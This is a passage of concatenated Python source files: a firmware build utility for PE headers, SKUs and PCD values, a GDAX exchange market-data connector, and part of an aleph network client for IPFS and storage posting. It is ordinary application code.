            self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
            return

        # Offset of the PE signature lives at 0x3C (little-endian).
        PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
        PeObject.seek(PeOffset)
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, 4)
        # PE signature should be 'PE\0\0'. Fix: compare byte values —
        # array.tostring() was removed in Python 3.9, and comparing its
        # bytes result against a str is always unequal on Python 3.
        if ByteArray.tolist() != [0x50, 0x45, 0, 0]:
            self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
            return

        # Read COFF file header (0x14 bytes).
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, 0x14)
        ByteList = ByteArray.tolist()
        SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
        if SecNumber == 0:
            self.ErrorInfo = self.FileName + ' has no section header'
            return

        # Read PE optional header; its size is at offset 0x10 of the file header.
        OptionalHeaderSize = self._ByteListToInt(ByteList[0x10:0x12])
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, OptionalHeaderSize)
        ByteList = ByteArray.tolist()
        self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
        self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
        self.Size = self._ByteListToInt(ByteList[0x38:0x3C])

        # Read each 0x28-byte section header.
        for Index in range(SecNumber):
            ByteArray = array.array('B')
            ByteArray.fromfile(PeObject, 0x28)
            ByteList = ByteArray.tolist()
            SecName = self._ByteListToStr(ByteList[0:8])
            SecVirtualSize = self._ByteListToInt(ByteList[8:12])
            SecRawAddress = self._ByteListToInt(ByteList[20:24])
            SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
            self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
        self.IsValid = True

    def _ByteListToStr(self, ByteList):
        # Decode a NUL-terminated byte list into a str.
        String = ''
        for index in range(len(ByteList)):
            if ByteList[index] == 0:
                break
            String += chr(ByteList[index])
        return String

    def _ByteListToInt(self, ByteList):
        # Interpret the byte list as a little-endian unsigned integer.
        Value = 0
        for index in range(len(ByteList) - 1, -1, -1):
            Value = (Value << 8) | int(ByteList[index])
        return Value
class DefaultStore():
    """Helpers over the platform's DefaultStores mapping (store id -> name)."""
    def __init__(self,DefaultStores ):
        # Mapping of default-store identifiers to their entries.
        self.DefaultStores = DefaultStores
    def DefaultStoreID(self,DefaultStoreName):
        """Return the key whose value equals DefaultStoreName, else None."""
        for key,value in self.DefaultStores.items():
            if value == DefaultStoreName:
                return key
        return None
    def GetDefaultDefault(self):
        """Return (id, name) of the default store: id "0" when present or
        when no stores exist, otherwise the numerically smallest id."""
        if not self.DefaultStores or "0" in self.DefaultStores:
            return "0",TAB_DEFAULT_STORES_DEFAULT
        else:
            minvalue = min([int(value_str) for value_str in self.DefaultStores.keys()])
            return (str(minvalue), self.DefaultStores[str(minvalue)])
    def GetMin(self,DefaultSIdList):
        """Return the name of the lowest-id store whose name is in
        DefaultSIdList; "STANDARD" for an empty list, "" when none match.

        NOTE(review): this method unpacks self.DefaultStores.values() as
        (storeid, storename) pairs, while DefaultStoreID/GetDefaultDefault
        treat the values as plain names — confirm which schema callers use.
        """
        if not DefaultSIdList:
            return "STANDARD"
        storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
        if not storeidset:
            return ""
        minid = min(storeidset )
        for sid,name in self.DefaultStores.values():
            if sid == minid:
                return name
class SkuClass():
    """Parse the SKU identifier selection against the platform's SkuIds
    table and expose the resolved SKU set, numbers, inheritance chain and
    usage type (DEFAULT / SINGLE / MULTIPLE)."""
    # SKU usage categories returned by the SkuUsageType property.
    DEFAULT = 0
    SINGLE = 1
    MULTIPLE =2
    def __init__(self,SkuIdentifier='', SkuIds=None):
        # SkuIds: name -> (id-string, ...) as parsed from the DSC.
        if SkuIds is None:
            SkuIds = {}
        # Reject SKU ids that do not fit in a UINT64.
        for SkuName in SkuIds:
            SkuId = SkuIds[SkuName][0]
            skuid_num = int(SkuId,16) if SkuId.upper().startswith("0X") else int(SkuId)
            if skuid_num > 0xFFFFFFFFFFFFFFFF:
                EdkLogger.error("build", PARAMETER_INVALID,
                            ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
                                      % (SkuName, SkuId))
        self.AvailableSkuIds = sdict()
        self.SkuIdSet = []
        self.SkuIdNumberSet = []
        self.SkuData = SkuIds
        self.__SkuInherit = {}
        self.__SkuIdentifier = SkuIdentifier
        # Resolve the identifier: empty -> DEFAULT only, 'ALL' -> every
        # SKU, otherwise a '|'-separated list of SKU names.
        if SkuIdentifier == '' or SkuIdentifier is None:
            self.SkuIdSet = ['DEFAULT']
            self.SkuIdNumberSet = ['0U']
        elif SkuIdentifier == 'ALL':
            self.SkuIdSet = SkuIds.keys()
            self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
        else:
            r = SkuIdentifier.split('|')
            self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
            k = None
            try:
                self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
            except Exception:
                EdkLogger.error("build", PARAMETER_INVALID,
                            ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
                                      % (k, " | ".join(SkuIds.keys())))
        # Every selected SKU must exist in the platform table.
        for each in self.SkuIdSet:
            if each in SkuIds:
                self.AvailableSkuIds[each] = SkuIds[each][0]
            else:
                EdkLogger.error("build", PARAMETER_INVALID,
                            ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
                                      % (each, " | ".join(SkuIds.keys())))
        if self.SkuUsageType != self.SINGLE:
            self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
        # Publish the selection globally (minus the COMMON pseudo-SKU).
        if self.SkuIdSet:
            GlobalData.gSkuids = (self.SkuIdSet)
            if 'COMMON' in GlobalData.gSkuids:
                GlobalData.gSkuids.remove('COMMON')
            if GlobalData.gSkuids:
                GlobalData.gSkuids.sort()
    def GetNextSkuId(self, skuname):
        """Return the parent SKU in the inheritance chain ('DEFAULT' at the root)."""
        if not self.__SkuInherit:
            self.__SkuInherit = {}
            for item in self.SkuData.values():
                self.__SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
        return self.__SkuInherit.get(skuname,"DEFAULT")
    def GetSkuChain(self,sku):
        """Return the inheritance chain from 'DEFAULT' down to sku."""
        skulist = [sku]
        nextsku = sku
        while 1:
            nextsku = self.GetNextSkuId(nextsku)
            skulist.append(nextsku)
            if nextsku == "DEFAULT":
                break
        skulist.reverse()
        return skulist
    def SkuOverrideOrder(self):
        """Interleave the chains of all selected SKUs into one override
        order, breadth-first, without duplicates."""
        skuorderset = []
        for skuname in self.SkuIdSet:
            skuorderset.append(self.GetSkuChain(skuname))
        skuorder = []
        for index in range(max([len(item) for item in skuorderset])):
            for subset in skuorderset:
                if index > len(subset)-1:
                    continue
                if subset[index] in skuorder:
                    continue
                skuorder.append(subset[index])
        return skuorder
    def __SkuUsageType(self):
        # Classify the selection as DEFAULT-only, a single SKU, or multiple.
        if self.__SkuIdentifier.upper() == "ALL":
            return SkuClass.MULTIPLE
        if len(self.SkuIdSet) == 1:
            if self.SkuIdSet[0] == 'DEFAULT':
                return SkuClass.DEFAULT
            else:
                return SkuClass.SINGLE
        elif len(self.SkuIdSet) == 2:
            if 'DEFAULT' in self.SkuIdSet:
                return SkuClass.SINGLE
            else:
                return SkuClass.MULTIPLE
        else:
            return SkuClass.MULTIPLE
    def DumpSkuIdArrary(self):
        """Render the selected SKU ids as a C array initializer string,
        following each SKU's inheritance chain and 0x0-terminating it."""
        ArrayStrList = []
        if self.SkuUsageType == SkuClass.SINGLE:
            ArrayStr = "{0x0}"
        else:
            for skuname in self.AvailableSkuIds:
                if skuname == "COMMON":
                    continue
                while skuname != "DEFAULT":
                    ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
                    skuname = self.GetNextSkuId(skuname)
                ArrayStrList.append("0x0")
            ArrayStr = "{" + ",".join(ArrayStrList) + "}"
        return ArrayStr
    def __GetAvailableSkuIds(self):
        return self.AvailableSkuIds
    def __GetSystemSkuID(self):
        # For a single-SKU build return that SKU's name, otherwise 'DEFAULT'.
        if self.__SkuUsageType() == SkuClass.SINGLE:
            if len(self.SkuIdSet) == 1:
                return self.SkuIdSet[0]
            else:
                return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
        else:
            return 'DEFAULT'
    def __GetAvailableSkuIdNumber(self):
        return self.SkuIdNumberSet
    SystemSkuId = property(__GetSystemSkuID)
    AvailableSkuIdSet = property(__GetAvailableSkuIds)
    SkuUsageType = property(__SkuUsageType)
    AvailableSkuIdNumSet = property(__GetAvailableSkuIdNumber)
#
# Pack a registry format GUID
#
def PackRegistryFormatGuid(Guid):
    """Pack a registry-format GUID string (8-4-4-4-12 hex groups) into its
    16-byte binary form: native-endian DWORD, two WORDs, then 8 raw bytes."""
    parts = Guid.split('-')
    clock_seq = parts[3]
    node = parts[4]
    # The trailing byte fields are taken from the END of groups 4 and 5,
    # two hex digits at a time, exactly as the original slicing did.
    tail_fields = [
        clock_seq[-4:-2], clock_seq[-2:],
        node[-12:-10], node[-10:-8], node[-8:-6],
        node[-6:-4], node[-4:-2], node[-2:],
    ]
    return pack('=LHHBBBBBBBB',
                int(parts[0], 16),
                int(parts[1], 16),
                int(parts[2], 16),
                *[int(field, 16) for field in tail_fields])
def BuildOptionPcdValueFormat(TokenSpaceGuidCName, TokenCName, PcdDatumType, Value):
    """Normalize a PCD value given on the build command line.

    VOID* values are wrapped into the L"..."/H{...}/"..." forms, the
    result is validated with CheckPcdDatum, and BOOLEAN values are
    canonicalized to '1'/'0'.
    """
    if PcdDatumType == 'VOID*':
        if Value.startswith('L'):
            # Fix: the original tested Value[1] — a single character is
            # always truthy, so the guard never fired, and a bare 'L'
            # raised IndexError instead of the intended error.
            if not Value[1:]:
                EdkLogger.error("build", FORMAT_INVALID, 'For Void* type PCD, when specify the Value in the command line, please use the following format: "string", L"string", H"{...}"')
            Value = Value[0] + '"' + Value[1:] + '"'
        elif Value.startswith('H'):
            # Same fix as above for the H"{...}" form.
            if not Value[1:]:
                EdkLogger.error("build", FORMAT_INVALID, 'For Void* type PCD, when specify the Value in the command line, please use the following format: "string", L"string", H"{...}"')
            Value = Value[1:]
        else:
            # Fix: Value[0] raised IndexError on an empty string.
            if not Value:
                EdkLogger.error("build", FORMAT_INVALID, 'For Void* type PCD, when specify the Value in the command line, please use the following format: "string", L"string", H"{...}"')
            Value = '"' + Value + '"'

    IsValid, Cause = CheckPcdDatum(PcdDatumType, Value)
    if not IsValid:
        EdkLogger.error("build", FORMAT_INVALID, Cause, ExtraData="%s.%s" % (TokenSpaceGuidCName, TokenCName))
    if PcdDatumType == 'BOOLEAN':
        Value = Value.upper()
        if Value == 'TRUE' or Value == '1':
            Value = '1'
        elif Value == 'FALSE' or Value == '0':
            Value = '0'
    return Value
## Get the integer value from string like "14U" or integer like 2
#
# @param Input   The object that may be either a integer value or a string
#
# @retval Value    The integer value that the input represents
#
def GetIntegerValue(Input):
    # Fix: the original used `type(Input) in (int, long)`, which raises
    # NameError on Python 3 (no `long`) and is the non-idiomatic form of
    # an isinstance check. On Python 3 all integers are `int`.
    if isinstance(Input, int):
        return Input
    String = Input
    # Strip C-style integer suffixes; the checks are sequential so
    # combinations like "10LLU" are peeled in order.
    if String.endswith("U"):
        String = String[:-1]
    if String.endswith("ULL"):
        String = String[:-3]
    if String.endswith("LL"):
        String = String[:-2]
    if String.startswith("0x") or String.startswith("0X"):
        return int(String, 16)
    elif String == '':
        # An empty (suffix-only) string counts as zero.
        return 0
    else:
        return int(String)
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
    pass  # Library module: nothing to do when executed directly.
|
gdax.py | from bitfeeds.restful_api_socket import RESTfulApiSocket
from bitfeeds.ws_api_socket import WebSocketApiSocket
from bitfeeds.market_data import L2Depth, Trade
from bitfeeds.exchange import ExchangeGateway
from bitfeeds.instrument import Instrument
from bitfeeds.sql_storage_template import SqlStorageTemplate
from bitfeeds.util import Logger
import time
import threading
import json
from functools import partial
from datetime import datetime
class GdaxBroker(RESTfulApiSocket):
    """
    Exchange gateway RESTfulApi

    REST-polling side of the GDAX connector: fetches a level-2 order
    book snapshot and parses the top five levels into an L2Depth.
    """
    def __init__(self):
        RESTfulApiSocket.__init__(self)

    @classmethod
    def get_bids_field_name(cls):
        # JSON field holding the bid side of the book.
        return 'bids'

    @classmethod
    def get_asks_field_name(cls):
        # JSON field holding the ask side of the book.
        return 'asks'

    @classmethod
    def get_order_book_link(cls, instmt):
        """Return the REST endpoint for a level-2 order book snapshot."""
        return "https://api.gdax.com/products/%s/book?level=2" % instmt.get_instmt_code()

    @classmethod
    def parse_l2_depth(cls, instmt, raw):
        """
        Parse raw data to L2 depth
        :param instmt: Instrument
        :param raw: Raw data in JSON
        """
        l2_depth = L2Depth()
        keys = list(raw.keys())
        if cls.get_bids_field_name() in keys and \
           cls.get_asks_field_name() in keys:
            # Date time (local arrival time, not the exchange timestamp)
            l2_depth.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")

            # Bids — best (highest) price first.
            # BUG FIX: prices arrive as strings; the original sorted them
            # lexicographically, which misorders e.g. "9999.99" vs
            # "10000.00". Sort numerically instead.
            bids = raw[cls.get_bids_field_name()]
            bids = sorted(bids, key=lambda x: float(x[0]), reverse=True)
            # NOTE(review): assumes at least 5 levels on each side —
            # fewer would raise IndexError, as in the original.
            for i in range(0, 5):
                l2_depth.bids[i].price = float(bids[i][0]) if type(bids[i][0]) != float else bids[i][0]
                l2_depth.bids[i].volume = float(bids[i][1]) if type(bids[i][1]) != float else bids[i][1]

            # Asks — best (lowest) price first.
            asks = raw[cls.get_asks_field_name()]
            asks = sorted(asks, key=lambda x: float(x[0]))
            for i in range(0, 5):
                l2_depth.asks[i].price = float(asks[i][0]) if type(asks[i][0]) != float else asks[i][0]
                l2_depth.asks[i].volume = float(asks[i][1]) if type(asks[i][1]) != float else asks[i][1]
        else:
            raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
                (instmt.get_exchange_name(), instmt.get_instmt_name(), \
                 raw))

        return l2_depth

    @classmethod
    def parse_trade(cls, instmt, raw):
        """
        Trades come over the websocket feed, never via REST.
        :param instmt: Instrument
        :param raw: Raw data in JSON
        """
        raise Exception("parse_trade should not be called.")

    @classmethod
    def get_order_book(cls, instmt):
        """
        Get order book
        :param instmt: Instrument
        :return: Object L2Depth, or None when the REST call returns nothing
        """
        res = cls.request(cls.get_order_book_link(instmt))
        if len(res) > 0:
            return cls.parse_l2_depth(instmt=instmt,
                                      raw=res)
        else:
            return None

    @classmethod
    def get_trades(cls, instmt):
        """
        Get trades
        :param instmt: Instrument
        :return: List of trades
        """
        raise Exception("get_trades should not be called.")
class ExchGwApiGdaxTrades(WebSocketApiSocket):
    """
    Exchange socket

    Websocket side of the GDAX connector: subscribes to the feed and
    turns incoming "match" events into Trade objects.
    """
    def __init__(self):
        """
        Constructor
        """
        WebSocketApiSocket.__init__(self, 'Gdax')

    @classmethod
    def get_trades_timestamp_field_name(cls):
        return 'time'

    @classmethod
    def get_trade_side_field_name(cls):
        return 'side'

    @classmethod
    def get_trade_id_field_name(cls):
        return 'trade_id'

    @classmethod
    def get_trade_price_field_name(cls):
        return 'price'

    @classmethod
    def get_trade_volume_field_name(cls):
        return 'size'

    @classmethod
    def get_link(cls):
        return 'wss://ws-feed.gdax.com'

    @classmethod
    def get_trades_subscription_string(cls, instmt):
        """Build the JSON subscription payload for the instrument."""
        return json.dumps({"type":"subscribe", "product_id": instmt.get_instmt_code()})

    @classmethod
    def parse_l2_depth(cls, instmt, raw):
        """
        Order book snapshots come via REST, never this socket.
        :param instmt: Instrument
        :param raw: Raw data in JSON
        """
        raise Exception("parse_l2_depth should not be called.")

    @classmethod
    def parse_trade(cls, instmt, raw):
        """
        Build a Trade from a websocket "match" message.
        :param instmt: Instrument
        :param raw: Raw data in JSON
        :return: Trade
        """
        trade = Trade()
        required_fields = (
            cls.get_trades_timestamp_field_name(),
            cls.get_trade_id_field_name(),
            cls.get_trade_side_field_name(),
            cls.get_trade_price_field_name(),
            cls.get_trade_volume_field_name(),
        )
        if not all(field in raw for field in required_fields):
            raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
                (instmt.get_exchange_name(), instmt.get_instmt_name(), \
                 raw))

        # Stamp with local arrival time rather than the exchange timestamp.
        trade.date_time = datetime.utcnow().strftime("%Y%m%d %H:%M:%S.%f")
        trade.trade_side = Trade.parse_side(raw[cls.get_trade_side_field_name()])
        trade.trade_id = str(raw[cls.get_trade_id_field_name()])
        trade.trade_price = float(raw[cls.get_trade_price_field_name()])
        trade.trade_volume = float(raw[cls.get_trade_volume_field_name()])
        return trade
class ExchGwGdax(ExchangeGateway):
    """
    Exchange gateway

    Combines the websocket trade feed (self.api_socket) with REST
    order-book polling (self.api_socket2) for one instrument.
    """
    def __init__(self, db_storages):
        """
        Constructor
        :param db_storages: List of database storages
        """
        ExchangeGateway.__init__(self, ExchGwApiGdaxTrades(), db_storages)
        # BUG FIX: the original constructed ExchGwApiGdaxOrderBook(),
        # a name defined nowhere in this module (NameError at runtime).
        # The REST order-book class in this module is GdaxBroker.
        self.api_socket2 = GdaxBroker()

    @classmethod
    def get_exchange_name(cls):
        """
        Get exchange name
        :return: Exchange name string
        """
        return 'Gdax'

    def on_open_handler(self, instmt, ws):
        """
        Socket on open handler: subscribe the instrument once.
        :param instmt: Instrument
        :param ws: Web socket
        """
        Logger.info(self.__class__.__name__, "Instrument %s is subscribed in channel %s" % \
                  (instmt.get_instmt_code(), instmt.get_exchange_name()))
        if not instmt.get_subscribed():
            ws.send(self.api_socket.get_trades_subscription_string(instmt))
            instmt.set_subscribed(True)

    def on_close_handler(self, instmt, ws):
        """
        Socket on close handler: mark the instrument unsubscribed so a
        reconnect re-subscribes it.
        :param instmt: Instrument
        :param ws: Web socket
        """
        Logger.info(self.__class__.__name__, "Instrument %s is unsubscribed in channel %s" % \
                  (instmt.get_instmt_code(), instmt.get_exchange_name()))
        instmt.set_subscribed(False)

    def on_message_handler(self, instmt, message):
        """
        Incoming message handler: only "match" events for this instrument
        become trades; duplicate trade ids are dropped.
        :param instmt: Instrument
        :param message: Message
        """
        keys = message.keys()
        if 'type' in keys and 'product_id' in keys:
            if message['type'] == "match":
                if message["product_id"] == instmt.get_instmt_code():
                    # Filter out the initial subscriptions
                    trade = self.api_socket.parse_trade(instmt, message)
                    if trade.trade_id != instmt.get_exch_trade_id():
                        instmt.incr_trade_id()
                        instmt.set_exch_trade_id(trade.trade_id)
                        self.insert_trade(instmt, trade)
        else:
            # Never handle order book query here
            pass

    def get_order_book_worker(self, instmt):
        """
        Get order book worker: poll the REST snapshot once per second and
        persist it whenever it differs from the previous one.
        :param instmt: Instrument
        """
        while True:
            try:
                l2_depth = self.api_socket2.get_order_book(instmt)
                if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
                    instmt.set_prev_l2_depth(instmt.get_l2_depth())
                    instmt.set_l2_depth(l2_depth)
                    instmt.incr_order_book_id()
                    self.insert_order_book(instmt)
            except Exception as e:
                Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
            time.sleep(1)

    def start(self, instmt):
        """
        Start the exchange gateway
        :param instmt: Instrument
        :return List of threads
        """
        instmt.set_l2_depth(L2Depth(50))
        instmt.set_prev_l2_depth(L2Depth(50))
        instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
                                                                                  instmt.get_instmt_name()))
        self.init_instmt_snapshot_table(instmt)
        t_trades = self.api_socket.connect(url=self.api_socket.get_link(),
                                           on_message_handler=partial(self.on_message_handler, instmt),
                                           on_open_handler=partial(self.on_open_handler, instmt),
                                           on_close_handler=partial(self.on_close_handler, instmt))
        t_order_book = threading.Thread(target=partial(self.get_order_book_worker, instmt))
        t_order_book.start()
        return [t_order_book, t_trades]
if __name__ == '__main__':
    # Wire up one BTC-USD instrument backed by a SQL storage template
    # and start the gateway threads.
    instmt = Instrument('Gdax', 'BTCUSD', 'BTC-USD')
    db_storage = SqlStorageTemplate()
    Logger.init_log()
    exch = ExchGwGdax([db_storage])
    td = exch.start(instmt)
|
asynchronous.py | """ This is the simplest aleph network client available.
"""
import asyncio
import hashlib
import json
import logging
import queue
import threading
import time
from abc import abstractmethod
from datetime import datetime
from enum import Enum
from functools import lru_cache
from yarl import URL
logger = logging.getLogger(__name__)
# 'magic' (libmagic bindings) is optional: it is only used by create_store
# to guess MIME types, so degrade gracefully when it is not installed.
try:
    import magic  # type:ignore
except ImportError:
    logger.warning("Could not import library 'magic'")
    magic = None  # type:ignore
from .conf import settings
from typing import Optional, Iterable, Union, Any, Dict, List, AsyncIterable
from typing_extensions import Protocol # Python < 3.8
import aiohttp
from aiohttp import ClientSession
from aleph_message.models.program import ProgramContent, Encoding # type: ignore
class StorageEnum(str, Enum):
    # Storage backends accepted by the aleph API ("item_type" values).
    ipfs = "ipfs"
    storage = "storage"
# Use a protocol to avoid importing crypto libraries
class Account(Protocol):
    """Structural interface for chain accounts used to sign messages."""
    # Chain identifier (e.g. which blockchain the account belongs to).
    CHAIN: str
    # Signature curve identifier.
    CURVE: str
    private_key: Union[str, bytes]

    @abstractmethod
    async def sign_message(self, message: Dict) -> Dict:
        """Return the message with its signature fields filled in."""
        ...

    @abstractmethod
    def get_address(self) -> str:
        ...

    @abstractmethod
    def get_public_key(self) -> str:
        ...

    @abstractmethod
    async def decrypt(self, content) -> bytes:
        ...
@lru_cache()
def _get_fallback_session(thread_id: Optional[int]) -> ClientSession:
    """Create the shared ClientSession for one thread (cached per thread_id).

    NOTE(review): the unbounded lru_cache keeps one session alive per
    thread id for the process lifetime — confirm that is intended.
    """
    if not settings.API_UNIX_SOCKET:
        return aiohttp.ClientSession()
    connector = aiohttp.UnixConnector(path=settings.API_UNIX_SOCKET)
    return aiohttp.ClientSession(connector=connector)
def get_fallback_session() -> ClientSession:
    """Return this thread's cached fallback ClientSession."""
    return _get_fallback_session(thread_id=threading.get_native_id())
def wrap_async(func):
    """Wrap an async function into a blocking one that drives the event loop.

    Fixes over the original: `asyncio.get_event_loop()` raises RuntimeError
    in threads without a current event loop — create and install one in
    that case; and `functools.wraps` preserves the wrapped function's
    metadata (name, docstring).
    """
    from functools import wraps  # local import: module only imports lru_cache at top level

    @wraps(func)
    def func_caller(*args, **kwargs):
        try:
            loop = asyncio.get_event_loop()
        except RuntimeError:
            loop = asyncio.new_event_loop()
            asyncio.set_event_loop(loop)
        return loop.run_until_complete(func(*args, **kwargs))

    return func_caller
async def ipfs_push(
    content, session: Optional[ClientSession] = None, api_server: str = settings.API_HOST
) -> str:
    """Store *content* as JSON on IPFS via the API and return its hash."""
    session = session or get_fallback_session()
    url = f"{api_server}/api/v0/ipfs/add_json"
    async with session.post(url, json=content) as resp:
        resp.raise_for_status()
        payload = await resp.json()
    return payload.get("hash")
sync_ipfs_push = wrap_async(ipfs_push)
async def storage_push(
    content, session: Optional[ClientSession] = None, api_server: str = settings.API_HOST
) -> str:
    """Store *content* as JSON on the aleph storage engine and return its hash."""
    session = session or get_fallback_session()
    url = f"{api_server}/api/v0/storage/add_json"
    async with session.post(url, json=content) as resp:
        resp.raise_for_status()
        payload = await resp.json()
    return payload.get("hash")
sync_storage_push = wrap_async(storage_push)
async def ipfs_push_file(
    file_content,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
) -> str:
    """Upload raw file content to IPFS and return its hash."""
    session = session or get_fallback_session()
    form = aiohttp.FormData()
    form.add_field("file", file_content)
    url = f"{api_server}/api/v0/ipfs/add_file"
    async with session.post(url, data=form) as resp:
        resp.raise_for_status()
        payload = await resp.json()
    return payload.get("hash")
sync_ipfs_push_file = wrap_async(ipfs_push_file)
async def storage_push_file(
    file_content,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
) -> str:
    """Upload raw file content to the aleph storage engine and return its hash."""
    session = session or get_fallback_session()
    form = aiohttp.FormData()
    form.add_field("file", file_content)
    url = f"{api_server}/api/v0/storage/add_file"
    async with session.post(url, data=form) as resp:
        resp.raise_for_status()
        payload = await resp.json()
    return payload.get("hash")
sync_storage_push_file = wrap_async(storage_push_file)
async def broadcast(
    message, session: Optional[ClientSession] = None, api_server: str = settings.API_HOST
):
    """Publish a signed message on the aleph pubsub topic.

    Returns the API response's "value" field. A "warning" status means the
    message was only partially published; it is logged but not raised.
    """
    session = session or get_fallback_session()
    async with session.post(
        f"{api_server}/api/v0/ipfs/pubsub/pub",
        json={"topic": "ALEPH-TEST", "data": json.dumps(message)},
    ) as response:
        response.raise_for_status()
        result = await response.json()
        if result["status"] == "warning":
            if 'failed' in result:
                # Requires recent version of Pyaleph
                # (lazy %-style args instead of an eagerly-built f-string)
                logger.warning("Message failed to publish on %s", result.get('failed'))
            else:
                # Fix: was an f-string with no placeholders.
                logger.warning("Message failed to publish on IPFS and/or P2P")
        return result.get("value")
sync_broadcast = wrap_async(broadcast)
async def create_post(
    account: Account,
    post_content,
    post_type: str,
    ref=None,
    address: Optional[str] = settings.ADDRESS_TO_USE,
    channel: str = "TEST",
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
    inline: bool = True,
    storage_engine: str = "storage",
):
    """Build a POST message payload and submit it to the network."""
    address = address or account.get_address()
    # Key order matters: it determines the serialized item_content and
    # therefore the message hash.
    post = dict(
        type=post_type,
        address=address,
        content=post_content,
        time=time.time(),
    )
    if ref is not None:
        post["ref"] = ref
    return await submit(
        account,
        post,
        "POST",
        channel=channel,
        api_server=api_server,
        session=session,
        inline=inline,
        storage_engine=storage_engine,
    )
sync_create_post = wrap_async(create_post)
async def create_aggregate(
    account: Account,
    key,
    content,
    address: Optional[str] = settings.ADDRESS_TO_USE,
    channel: str = "TEST",
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
):
    """Build an AGGREGATE message payload and submit it to the network."""
    address = address or account.get_address()
    post = dict(key=key, address=address, content=content, time=time.time())
    return await submit(
        account,
        post,
        "AGGREGATE",
        channel=channel,
        api_server=api_server,
        session=session,
    )
sync_create_aggregate = wrap_async(create_aggregate)
async def create_store(
    account: Account,
    address=settings.ADDRESS_TO_USE,
    file_content: Optional[bytes] = None,
    file_hash: Optional[str] = None,
    guess_mime_type: bool = False,
    ref: Optional[str] = None,
    storage_engine="storage",
    extra_fields: Optional[dict] = None,
    channel: str = "TEST",
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
):
    """Upload a file (or reference an already-stored hash) and submit a
    STORE message.

    Raises ValueError when neither file_content nor file_hash is given,
    or when storage_engine is not "storage"/"ipfs".
    """
    address = address or account.get_address()
    extra_fields = extra_fields or {}
    if file_hash is None:
        if file_content is None:
            raise ValueError("Please specify at least a file_content or a file_hash")
        if storage_engine == "storage":
            file_hash = await storage_push_file(
                file_content, session=session, api_server=api_server
            )
        elif storage_engine == "ipfs":
            file_hash = await ipfs_push_file(
                file_content, session=session, api_server=api_server
            )
        else:
            raise ValueError(f"Unknown storage engine: '{storage_engine}'")
    # BUG FIX: only sniff the MIME type when there is content to sniff —
    # the original called magic.from_buffer(None) when a file_hash was
    # supplied without file_content.
    if (
        magic is not None
        and guess_mime_type is True
        and "mime_type" not in extra_fields
        and file_content is not None
    ):
        extra_fields["mime_type"] = magic.from_buffer(file_content, mime=True)
    if ref:
        extra_fields["ref"] = ref
    store_content = {
        "address": address,
        "item_type": storage_engine,
        "item_hash": file_hash,
        "time": time.time(),
    }
    # extra_fields is always a dict at this point; the original's
    # 'is not None' re-check was dead code.
    store_content.update(extra_fields)
    return await submit(
        account,
        store_content,
        "STORE",
        channel=channel,
        api_server=api_server,
        session=session,
        inline=True,
    )
sync_create_store = wrap_async(create_store)
async def create_program(
    account: Account,
    program_ref: str,
    entrypoint: str,
    runtime: str,
    storage_engine: StorageEnum = StorageEnum.storage,
    channel: str = "TEST",
    address: Optional[str] = settings.ADDRESS_TO_USE,
    session: Optional[ClientSession] = None,
    api_server: str = settings.API_HOST,
    memory: int = settings.DEFAULT_VM_MEMORY,
    encoding: Encoding = Encoding.zip,
    volumes: Optional[List[Dict]] = None,
    subscriptions: Optional[List[Dict]] = None,
):
    """Register a VM function program on the aleph network.

    program_ref references the stored code archive, entrypoint names the
    callable inside it, and runtime references the VM runtime image. The
    content is validated by the ProgramContent model before submission.
    """
    volumes = volumes if volumes is not None else []
    address = address or account.get_address()
    # TODO: Check that program_ref, runtime and data_ref exist
    ## Register the different ways to trigger a VM
    if subscriptions:
        # Trigger on HTTP calls and on Aleph message subscriptions.
        triggers = {
            "http": True,
            "message": subscriptions
        }
    else:
        # Trigger on HTTP calls.
        triggers = {"http": True}
    content = ProgramContent(**{
        "type": "vm-function",
        "address": address,
        "allow_amend": False,
        "code": {
            "encoding": encoding,
            "entrypoint": entrypoint,
            "ref": program_ref,
            "use_latest": True,
        },
        "on": triggers,
        "environment": {
            "reproducible": False,
            "internet": True,
            "aleph_api": True,
        },
        "resources": {
            "vcpus": 1,
            "memory": memory,
            "seconds": 30,
        },
        "runtime": {
            "ref": runtime,
            "use_latest": True,
            "comment": "Aleph Alpine Linux with Python 3.8",
        },
        "volumes": volumes,
        # Example volume entries kept from the original author:
        # {
        #     "mount": "/opt/venv",
        #     "ref": "5f31b0706f59404fad3d0bff97ef89ddf24da4761608ea0646329362c662ba51",
        #     "use_latest": False
        # },
        # {
